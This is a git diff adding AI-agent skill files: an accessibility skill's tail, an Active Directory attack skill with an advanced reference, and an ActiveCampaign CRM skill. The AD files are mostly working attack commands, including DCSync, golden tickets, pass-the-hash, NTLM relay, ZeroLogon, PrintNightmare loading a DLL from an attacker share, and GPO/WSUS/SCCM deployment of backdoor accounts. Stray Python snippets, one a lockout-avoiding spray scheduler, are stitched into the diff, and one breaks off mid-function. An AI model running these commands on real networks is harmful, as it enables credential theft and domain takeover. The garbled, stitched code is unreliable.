+ `,
+ )
+ .join("")}
+
+`;
+ }
+}
+```
+
+## Output Format
+
+1. **Accessibility Score**: Overall compliance with WCAG levels
+2. **Violation Report**: Detailed issues with severity and fixes
+3. **Test Results**: Automated and manual test outcomes
+4. **Remediation Guide**: Step-by-step fixes for each issue
+5. **Code Examples**: Accessible component implementations
+
+Focus on creating inclusive experiences that work for all users, regardless of their abilities or assistive technologies.
diff --git a/web-app/public/skills/active-directory-attacks/SKILL.md b/web-app/public/skills/active-directory-attacks/SKILL.md
new file mode 100644
index 00000000..654fbae3
--- /dev/null
+++ b/web-app/public/skills/active-directory-attacks/SKILL.md
@@ -0,0 +1,383 @@
+---
+name: Active Directory Attacks
+description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
+metadata:
+ author: zebbern
+ version: "1.1"
+---
+
+# Active Directory Attacks
+
+## Purpose
+
+Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
+
+## Inputs/Prerequisites
+
+- Kali Linux or Windows attack platform
+- Domain user credentials (for most attacks)
+- Network access to Domain Controller
+- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
+
+## Outputs/Deliverables
+
+- Domain enumeration data
+- Extracted credentials and hashes
+- Kerberos tickets for impersonation
+- Domain Administrator access
+- Persistent access mechanisms
+
+---
+
+## Essential Tools
+
+| Tool | Purpose |
+|------|---------|
+| BloodHound | AD attack path visualization |
+| Impacket | Python AD attack tools |
+| Mimikatz | Credential extraction |
+| Rubeus | Kerberos attacks |
+| CrackMapExec | Network exploitation |
+| PowerView | AD enumeration |
+| Responder | LLMNR/NBT-NS poisoning |
+
+---
+
+## Core Workflow
+
+### Step 1: Kerberos Clock Sync
+
+Kerberos requires clock synchronization (±5 minutes):
+
+```bash
+# Detect clock skew
+nmap -sT 10.10.10.10 -p445 --script smb2-time
+
+# Fix clock on Linux
+sudo date -s "14 APR 2024 18:25:16"
+
+# Fix clock on Windows
+net time /domain /set
+
+# Fake the clock for a single command without changing system time
+faketime -f '+8h' date
+```
+
+### Step 2: AD Reconnaissance with BloodHound
+
+```bash
+# Start BloodHound
+neo4j console
+bloodhound --no-sandbox
+
+# Collect data with SharpHound
+.\SharpHound.exe -c All
+.\SharpHound.exe -c All --ldapusername user --ldappassword pass
+
+# Python collector (from Linux)
+bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
+```
+
+### Step 3: PowerView Enumeration
+
+```powershell
+# Get domain info
+Get-NetDomain
+Get-DomainSID
+Get-NetDomainController
+
+# Enumerate users
+Get-NetUser
+Get-NetUser -SamAccountName targetuser
+Get-UserProperty -Properties pwdlastset
+
+# Enumerate groups
+Get-NetGroupMember -GroupName "Domain Admins"
+Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
+
+# Find local admin access
+Find-LocalAdminAccess -Verbose
+
+# User hunting
+Invoke-UserHunter
+Invoke-UserHunter -Stealth
+```
+
+---
+
+## Credential Attacks
+
+### Password Spraying
+
+```bash
+# Using kerbrute
+./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
+
+# Using CrackMapExec
+crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
+```
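Spraying too aggressively locks out accounts (see Constraints below). A minimal sketch for computing a safe spray schedule from the domain's lockout policy (values are illustrative; read the real policy first, e.g. with `net accounts /domain`):

```python
# Hedged sketch: how many spray rounds fit safely inside a lockout
# observation window, leaving a safety margin below the threshold.
def safe_spray_schedule(lockout_threshold: int,
                        observation_window_min: int,
                        safety_margin: int = 2) -> dict:
    """Return attempts per window and the wait (minutes) between rounds."""
    if lockout_threshold <= 0:          # 0 means lockout is disabled
        return {"attempts_per_window": float("inf"), "wait_min": 0}
    attempts = max(1, lockout_threshold - safety_margin)
    # Space the rounds so the bad-password counter resets between windows.
    wait = observation_window_min / attempts
    return {"attempts_per_window": attempts, "wait_min": wait}

# Example: threshold 5, 30-minute observation window.
print(safe_spray_schedule(5, 30))
```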
+
+### Kerberoasting
+
+Extract service account TGS tickets and crack offline:
+
+```bash
+# Impacket
+GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
+
+# Rubeus
+.\Rubeus.exe kerberoast /outfile:hashes.txt
+
+# CrackMapExec
+crackmapexec ldap 10.10.10.10 -u user -p password --kerberoasting output.txt
+
+# Crack with hashcat
+hashcat -m 13100 hashes.txt rockyou.txt
+```
+
+### AS-REP Roasting
+
+Target accounts with "Do not require Kerberos preauthentication":
+
+```bash
+# Impacket
+GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
+
+# Rubeus
+.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
+
+# Crack with hashcat
+hashcat -m 18200 hashes.txt rockyou.txt
+```
+
+### DCSync Attack
+
+Extract credentials directly from DC (requires Replicating Directory Changes rights):
+
+```bash
+# Impacket
+secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
+
+# Mimikatz
+lsadump::dcsync /domain:domain.local /user:krbtgt
+lsadump::dcsync /domain:domain.local /user:Administrator
+```
+
+---
+
+## Kerberos Ticket Attacks
+
+### Pass-the-Ticket (Golden Ticket)
+
+Forge TGT with krbtgt hash for any user:
+
+```powershell
+# Get krbtgt hash via DCSync first
+# Mimikatz - Create Golden Ticket
+kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
+
+# Impacket
+ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
+export KRB5CCNAME=Administrator.ccache
+psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
+```
+
+### Silver Ticket
+
+Forge TGS for specific service:
+
+```powershell
+# Mimikatz
+kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
+```
+
+### Pass-the-Hash
+
+```bash
+# Impacket
+psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
+
+# CrackMapExec
+crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
+crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
+```
+
+### OverPass-the-Hash
+
+Convert NTLM hash to Kerberos ticket:
+
+```bash
+# Impacket
+getTGT.py domain.local/user -hashes :NTHASH
+export KRB5CCNAME=user.ccache
+
+# Rubeus
+.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
+```
+
+---
+
+## NTLM Relay Attacks
+
+### Responder + ntlmrelayx
+
+```bash
+# Start Responder (disable its SMB and HTTP servers in Responder.conf when relaying)
+responder -I eth0 -wrf
+
+# Start relay
+ntlmrelayx.py -tf targets.txt -smb2support
+
+# LDAP relay for delegation attack
+ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
+```
+
+### SMB Signing Check
+
+```bash
+crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
+```
+
+---
+
+## Certificate Services Attacks (AD CS)
+
+### ESC1 - Misconfigured Templates
+
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
+
+# Exploit ESC1
+certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
+
+# Authenticate with certificate
+certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
+```
+
+### ESC8 - Web Enrollment Relay
+
+```bash
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+```
+
+---
+
+## Critical CVEs
+
+### ZeroLogon (CVE-2020-1472)
+
+```bash
+# Check vulnerability
+crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
+
+# Exploit
+python3 cve-2020-1472-exploit.py DC01 10.10.10.10
+
+# Extract hashes
+secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
+
+# Restore password (important!)
+python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
+```
+
+### PrintNightmare (CVE-2021-1675)
+
+```bash
+# Check for vulnerability
+rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
+
+# Exploit (requires hosting malicious DLL)
+python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
+```
+
+### samAccountName Spoofing (CVE-2021-42278/42287)
+
+```bash
+# Automated exploitation
+python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
+```
+
+---
+
+## Quick Reference
+
+| Attack | Tool | Command |
+|--------|------|---------|
+| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
+| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
+| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
+| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
+| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
+| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
+
+---
+
+## Constraints
+
+**Must:**
+- Synchronize time with DC before Kerberos attacks
+- Have valid domain credentials for most attacks
+- Document all compromised accounts
+
+**Must Not:**
+- Lock out accounts with excessive password spraying
+- Modify production AD objects without approval
+- Leave Golden Tickets without documentation
+
+**Should:**
+- Run BloodHound for attack path discovery
+- Check for SMB signing before relay attacks
+- Verify patch levels for CVE exploitation
+
+---
+
+## Examples
+
+### Example 1: Domain Compromise via Kerberoasting
+
+```bash
+# 1. Find service accounts with SPNs
+GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
+
+# 2. Request TGS tickets
+GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
+
+# 3. Crack tickets
+hashcat -m 13100 tgs.txt rockyou.txt
+
+# 4. Use cracked service account
+psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
+```
+
+### Example 2: NTLM Relay to LDAP
+
+```bash
+# 1. Start relay targeting LDAP
+ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
+
+# 2. Trigger authentication (e.g., via PrinterBug)
+python3 printerbug.py domain.local/user:pass@target 10.10.10.12
+
+# 3. Use created machine account for RBCD attack
+```
+
+---
+
+## Troubleshooting
+
+| Issue | Solution |
+|-------|----------|
+| Clock skew too great | Sync time with DC or use faketime |
+| Kerberoasting returns empty | No service accounts with SPNs |
+| DCSync access denied | Need Replicating Directory Changes rights |
+| NTLM relay fails | Check SMB signing, try LDAP target |
+| BloodHound empty | Verify collector ran with correct creds |
+
+---
+
+## Additional Resources
+
+For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).
diff --git a/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md b/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md
new file mode 100644
index 00000000..2428ecf0
--- /dev/null
+++ b/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md
@@ -0,0 +1,382 @@
+# Advanced Active Directory Attacks Reference
+
+## Table of Contents
+1. [Delegation Attacks](#delegation-attacks)
+2. [Group Policy Object Abuse](#group-policy-object-abuse)
+3. [RODC Attacks](#rodc-attacks)
+4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
+5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
+6. [Trust Relationship Attacks](#trust-relationship-attacks)
+7. [ADFS Golden SAML](#adfs-golden-saml)
+8. [Credential Sources](#credential-sources)
+9. [Linux AD Integration](#linux-ad-integration)
+
+---
+
+## Delegation Attacks
+
+### Unconstrained Delegation
+
+When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
+
+**Find Delegation:**
+```powershell
+# PowerShell
+Get-ADComputer -Filter {TrustedForDelegation -eq $True}
+
+# BloodHound
+MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
+```
+
+**SpoolService Abuse:**
+```bash
+# Check spooler service
+ls \\dc01\pipe\spoolss
+
+# Trigger with SpoolSample
+.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
+
+# Or with printerbug.py
+python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
+```
+
+**Monitor with Rubeus:**
+```powershell
+Rubeus.exe monitor /interval:1
+```
+
+### Constrained Delegation
+
+**Identify:**
+```powershell
+Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
+```
+
+**Exploit with Rubeus:**
+```powershell
+# S4U2 attack
+Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+
+**Exploit with Impacket:**
+```bash
+getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
+```
+
+### Resource-Based Constrained Delegation (RBCD)
+
+```powershell
+# Create machine account
+New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
+
+# Set delegation
+Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
+
+# Get ticket
+.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+
+---
+
+## Group Policy Object Abuse
+
+### Find Vulnerable GPOs
+
+```powershell
+Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
+```
+
+### Abuse with SharpGPOAbuse
+
+```powershell
+# Add local admin
+.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
+
+# Add user rights
+.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
+
+# Add immediate task
+.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
+```
+
+### Abuse with pyGPOAbuse (Linux)
+
+```bash
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
+```
+
+---
+
+## RODC Attacks
+
+### RODC Golden Ticket
+
+RODCs hold a filtered copy of the AD database (LAPS and BitLocker keys are excluded). Tickets can be forged for principals included in msDS-RevealOnDemandGroup.
+
+### RODC Key List Attack
+
+**Requirements:**
+- krbtgt credentials of the RODC (-rodcKey)
+- ID of the krbtgt account of the RODC (-rodcNo)
+
+```bash
+# Impacket keylistattack
+keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
+
+# Using secretsdump with keylist
+secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
+```
+
+**Using Rubeus:**
+```powershell
+Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
+```
+
+---
+
+## SCCM/WSUS Deployment
+
+### SCCM Attack with MalSCCM
+
+```bash
+# Locate SCCM server
+MalSCCM.exe locate
+
+# Enumerate targets
+MalSCCM.exe inspect /all
+MalSCCM.exe inspect /computers
+
+# Create target group
+MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
+MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
+
+# Create malicious app
+MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
+
+# Deploy
+MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
+
+# Force checkin
+MalSCCM.exe checkin /groupname:TargetGroup
+
+# Cleanup
+MalSCCM.exe app /cleanup /name:backdoor
+MalSCCM.exe group /delete /groupname:TargetGroup
+```
+
+### SCCM Network Access Accounts
+
+```powershell
+# Find SCCM blob
+Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
+
+# Decrypt with SharpSCCM
+.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
+```
+
+### WSUS Deployment Attack
+
+```bash
+# Using SharpWSUS
+SharpWSUS.exe locate
+SharpWSUS.exe inspect
+
+# Create malicious update
+SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
+
+# Deploy to target
+SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+
+# Check status
+SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
+
+# Cleanup
+SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+```
+
+---
+
+## AD Certificate Services (ADCS)
+
+### ESC1 - Misconfigured Templates
+
+Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
+
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
+
+# Request certificate as admin
+certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
+
+# Authenticate
+certipy auth -pfx administrator.pfx -dc-ip DC_IP
+```
+
+### ESC4 - ACL Vulnerabilities
+
+```python
+# Check for WriteProperty
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
+
+# Add ENROLLEE_SUPPLIES_SUBJECT flag
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+
+# Perform ESC1, then restore
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
+```
+
+### ESC8 - NTLM Relay to Web Enrollment
+
+```bash
+# Start relay
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+
+# Coerce authentication
+python3 petitpotam.py ATTACKER_IP DC_IP
+
+# Use certificate
+Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
+```
+
+### Shadow Credentials
+
+```bash
+# Add Key Credential (pyWhisker)
+python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
+
+# Get TGT with PKINIT
+python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
+
+# Get NT hash
+export KRB5CCNAME=target.ccache
+python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
+```
+
+---
+
+## Trust Relationship Attacks
+
+### Child to Parent Domain (SID History)
+
+```powershell
+# Get Enterprise Admins SID from parent
+$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
+
+# Create Golden Ticket with SID History
+kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
+```
+
+### Forest to Forest (Trust Ticket)
+
+```bash
+# Dump trust key
+lsadump::trust /patch
+
+# Forge inter-realm TGT
+kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
+
+# Use trust ticket
+.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
+```
+
+---
+
+## ADFS Golden SAML
+
+**Requirements:**
+- ADFS service account access
+- Token signing certificate (PFX + decryption password)
+
+```bash
+# Dump with ADFSDump
+.\ADFSDump.exe
+
+# Forge SAML token
+python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
+```
+
+---
+
+## Credential Sources
+
+### LAPS Password
+
+```powershell
+# PowerShell
+Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
+
+# CrackMapExec
+crackmapexec ldap DC_IP -u user -p password -M laps
+```
+
+### GMSA Password
+
+```powershell
+# PowerShell + DSInternals
+$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
+$mp = $gmsa.'msDS-ManagedPassword'
+ConvertFrom-ADManagedPasswordBlob $mp
+```
+
+```bash
+# Linux with bloodyAD
+python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
+```
+
+### Group Policy Preferences (GPP)
+
+```bash
+# Find in SYSVOL
+findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
+
+# Decrypt
+python3 Get-GPPPassword.py -no-pass 'DC_IP'
+```
+
+### DSRM Credentials
+
+```powershell
+# Dump DSRM hash
+Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
+
+# Enable DSRM admin logon
+Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
+```
+
+---
+
+## Linux AD Integration
+
+### CCACHE Ticket Reuse
+
+```bash
+# Find tickets
+ls /tmp/ | grep krb5cc
+
+# Use ticket
+export KRB5CCNAME=/tmp/krb5cc_1000
+```
+
+### Extract from Keytab
+
+```bash
+# List keys
+klist -k /etc/krb5.keytab
+
+# Extract with KeyTabExtract
+python3 keytabextract.py /etc/krb5.keytab
+```
+
+### Extract from SSSD
+
+```bash
+# Database location
+/var/lib/sss/secrets/secrets.ldb
+
+# Key location
+/var/lib/sss/secrets/.secrets.mkey
+
+# Extract
+python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
+```
diff --git a/web-app/public/skills/activecampaign-automation/SKILL.md b/web-app/public/skills/activecampaign-automation/SKILL.md
new file mode 100644
index 00000000..f618bc0e
--- /dev/null
+++ b/web-app/public/skills/activecampaign-automation/SKILL.md
@@ -0,0 +1,209 @@
+---
+name: activecampaign-automation
+description: "Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas."
+requires:
+ mcp: [rube]
+---
+
+# ActiveCampaign Automation via Rube MCP
+
+Automate ActiveCampaign CRM and marketing automation operations through Composio's ActiveCampaign toolkit via Rube MCP.
+
+## Prerequisites
+
+- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
+- Active ActiveCampaign connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `active_campaign`
+- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
+
+## Setup
+
+**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
+
+1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
+2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `active_campaign`
+3. If connection is not ACTIVE, follow the returned auth link to complete ActiveCampaign authentication
+4. Confirm connection status shows ACTIVE before running any workflows
+
+## Core Workflows
+
+### 1. Create and Find Contacts
+
+**When to use**: User wants to create new contacts or look up existing ones
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Search for an existing contact [Optional]
+2. `ACTIVE_CAMPAIGN_CREATE_CONTACT` - Create a new contact [Required]
+
+**Key parameters for find**:
+- `email`: Search by email address
+- `id`: Search by ActiveCampaign contact ID
+- `phone`: Search by phone number
+
+**Key parameters for create**:
+- `email`: Contact email address (required)
+- `first_name`: Contact first name
+- `last_name`: Contact last name
+- `phone`: Contact phone number
+- `organization_name`: Contact's organization
+- `job_title`: Contact's job title
+- `tags`: Comma-separated list of tags to apply
+
+**Pitfalls**:
+- `email` is the only required field for contact creation
+- Phone search uses a general search parameter internally; it may return partial matches
+- When combining `email` and `phone` in FIND_CONTACT, results are filtered client-side
+- Tags provided during creation are applied immediately
+- Creating a contact with an existing email may update the existing contact
+
+### 2. Manage Contact Tags
+
+**When to use**: User wants to add or remove tags from contacts
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find contact by email or ID [Prerequisite]
+2. `ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG` - Add or remove tags [Required]
+
+**Key parameters**:
+- `action`: 'Add' or 'Remove' (required)
+- `tags`: Tag names as comma-separated string or array of strings (required)
+- `contact_id`: Contact ID (provide this or contact_email)
+- `contact_email`: Contact email address (alternative to contact_id)
+
+**Pitfalls**:
+- `action` values are capitalized: 'Add' or 'Remove' (not lowercase)
+- Tags can be a comma-separated string ('tag1, tag2') or an array (['tag1', 'tag2'])
+- Either `contact_id` or `contact_email` must be provided; `contact_id` takes precedence
+- Adding a tag that does not exist creates it automatically
+- Removing a non-existent tag is a no-op (does not error)
+
+### 3. Manage List Subscriptions
+
+**When to use**: User wants to subscribe or unsubscribe contacts from lists
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find the contact [Prerequisite]
+2. `ACTIVE_CAMPAIGN_MANAGE_LIST_SUBSCRIPTION` - Subscribe or unsubscribe [Required]
+
+**Key parameters**:
+- `action`: 'subscribe' or 'unsubscribe' (required)
+- `list_id`: Numeric list ID string (required)
+- `email`: Contact email address (provide this or contact_id)
+- `contact_id`: Numeric contact ID string (alternative to email)
+
+**Pitfalls**:
+- `action` values are lowercase: 'subscribe' or 'unsubscribe'
+- `list_id` is a numeric string (e.g., '2'), not the list name
+- List IDs can be retrieved via the GET /api/3/lists endpoint (not available as a Composio tool; use the ActiveCampaign UI)
+- If both `email` and `contact_id` are provided, `contact_id` takes precedence
+- Unsubscribing changes status to '2' (unsubscribed) but the relationship record persists
+
+### 4. Add Contacts to Automations
+
+**When to use**: User wants to enroll a contact in an automation workflow
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Verify contact exists [Prerequisite]
+2. `ACTIVE_CAMPAIGN_ADD_CONTACT_TO_AUTOMATION` - Enroll contact in automation [Required]
+
+**Key parameters**:
+- `contact_email`: Email of the contact to enroll (required)
+- `automation_id`: ID of the target automation (required)
+
+**Pitfalls**:
+- The contact must already exist in ActiveCampaign
+- Automations can only be created through the ActiveCampaign UI, not via API
+- `automation_id` must reference an existing, active automation
+- The tool performs a two-step process: lookup contact by email, then enroll
+- Automation IDs can be found in the ActiveCampaign UI or via GET /api/3/automations
+
+### 5. Create Contact Tasks
+
+**When to use**: User wants to create follow-up tasks associated with contacts
+
+**Tool sequence**:
+1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find the contact to associate the task with [Prerequisite]
+2. `ACTIVE_CAMPAIGN_CREATE_CONTACT_TASK` - Create the task [Required]
+
+**Key parameters**:
+- `relid`: Contact ID to associate the task with (required)
+- `duedate`: Due date in ISO 8601 format with timezone (required, e.g., '2025-01-15T14:30:00-05:00')
+- `dealTasktype`: Task type ID based on available types (required)
+- `title`: Task title
+- `note`: Task description/content
+- `assignee`: User ID to assign the task to
+- `edate`: End date in ISO 8601 format (must be later than duedate)
+- `status`: 0 for incomplete, 1 for complete
+
+**Pitfalls**:
+- `duedate` must be a valid ISO 8601 datetime with timezone offset; do NOT use placeholder values
+- `edate` must be later than `duedate`
+- `dealTasktype` is a string ID referencing task types configured in ActiveCampaign
+- `relid` is the numeric contact ID, not the email address
+- `assignee` is a user ID; resolve user names to IDs via the ActiveCampaign UI
+
+## Common Patterns
+
+### Contact Lookup Flow
+
+```
+1. Call ACTIVE_CAMPAIGN_FIND_CONTACT with email
+2. If found, extract contact ID for subsequent operations
+3. If not found, create contact with ACTIVE_CAMPAIGN_CREATE_CONTACT
+4. Use contact ID for tags, subscriptions, or automations
+```
+
+### Bulk Contact Tagging
+
+```
+1. For each contact, call ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG
+2. Use contact_email to avoid separate lookup calls
+3. Batch with reasonable delays to respect rate limits
+```
+
+### ID Resolution
+
+**Contact email -> Contact ID**:
+```
+1. Call ACTIVE_CAMPAIGN_FIND_CONTACT with email
+2. Extract id from the response
+```
+
+## Known Pitfalls
+
+**Action Capitalization**:
+- Tag actions: 'Add', 'Remove' (capitalized)
+- Subscription actions: 'subscribe', 'unsubscribe' (lowercase)
+- Mixing up capitalization causes errors
+
+**ID Types**:
+- Contact IDs: numeric strings (e.g., '123')
+- List IDs: numeric strings
+- Automation IDs: numeric strings
+- All IDs should be passed as strings, not integers
+
+**Automations**:
+- Automations cannot be created via API; only enrollment is possible
+- Automation must be active to accept new contacts
+- Enrolling a contact already in the automation may have no effect
+
+**Rate Limits**:
+- ActiveCampaign API has rate limits per account
+- Implement backoff on 429 responses
+- Batch operations should be spaced appropriately
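Backoff on 429 responses can be sketched generically; the wrapper below is a hypothetical helper, not part of the Composio/Rube API:

```python
import random
import time

# Hedged sketch: retry a tool call with exponential backoff on rate limits.
# `call` is any zero-argument function that raises RateLimitError on a 429.
class RateLimitError(Exception):
    pass

def with_backoff(call, max_retries=5, base_delay=1.0, sleep=time.sleep):
    for attempt in range(max_retries):
        try:
            return call()
        except RateLimitError:
            if attempt == max_retries - 1:
                raise  # out of retries; surface the rate-limit error
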